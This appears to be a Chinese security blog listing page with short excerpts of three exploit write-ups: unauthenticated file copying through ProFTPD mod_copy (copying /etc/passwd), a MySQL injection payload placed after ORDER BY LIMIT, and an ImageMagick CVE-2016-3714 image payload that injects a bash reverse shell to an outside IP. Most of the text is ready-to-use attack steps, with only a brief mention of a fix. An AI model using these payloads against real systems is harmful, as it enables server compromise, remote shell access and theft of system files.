安全漏洞
hrayha
这个作者很懒,什么都没留下…
展开
-
proftpd的mod_copy模块未授权调用利用记录
文章来源自《安全参考》第30期,略有改动 影响版本: proftpd-1.3.4---proftpd-1.3.5 1.执行命令 nc x.x.x.x 21 2.执行site cpfr /etc/passwd可以未授权状态复制文件 3.执行site cpto /tmp/test可将之前复制的/etc/passwd粘贴到/tmp/test 高级用法: s转载 2015-06-15 20:28:38 · 1372 阅读 · 0 评论 -
mysql注入-orderby之后limit位置
今天遇到的,记录下,如下位置产生sql注入 select xxx from x order by xx limit {sql} 花括号位置为可控的点,支持报错的话可以利用如下语句获取内容 http://test.com/test.php?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23 不支持报原创 2015-07-20 19:42:04 · 2470 阅读 · 0 评论 -
ImageMagick漏洞(cve-2016-3714)利用及修复
利用: 如下内容保存为图片格式上传即可(命令部分自行替换) push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")' pop graphic-context 修复(php): 上传时先利用getimage原创 2016-05-05 17:09:55 · 5268 阅读 · 3 评论